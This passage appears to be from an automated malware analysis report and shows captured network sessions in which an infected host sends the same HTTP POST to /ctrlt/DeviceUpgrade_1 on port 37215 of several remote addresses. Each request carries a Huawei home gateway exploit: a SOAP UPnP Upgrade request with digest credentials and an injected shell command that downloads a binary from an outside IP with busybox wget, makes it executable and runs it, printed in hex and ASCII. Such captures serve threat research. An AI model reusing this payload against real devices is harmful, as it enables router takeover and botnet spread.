                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:10.217881918 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:13.961716890 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      102192.168.2.1446708102.127.181.22637215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:06.663009882 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:07.466073990 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.426018000 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:10.314080954 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:14.217745066 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:21.897384882 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:37.000921011 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:08.999469042 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      103192.168.2.1459776197.115.141.25337215
                                                                      TimestampBytes transferredDirectionData
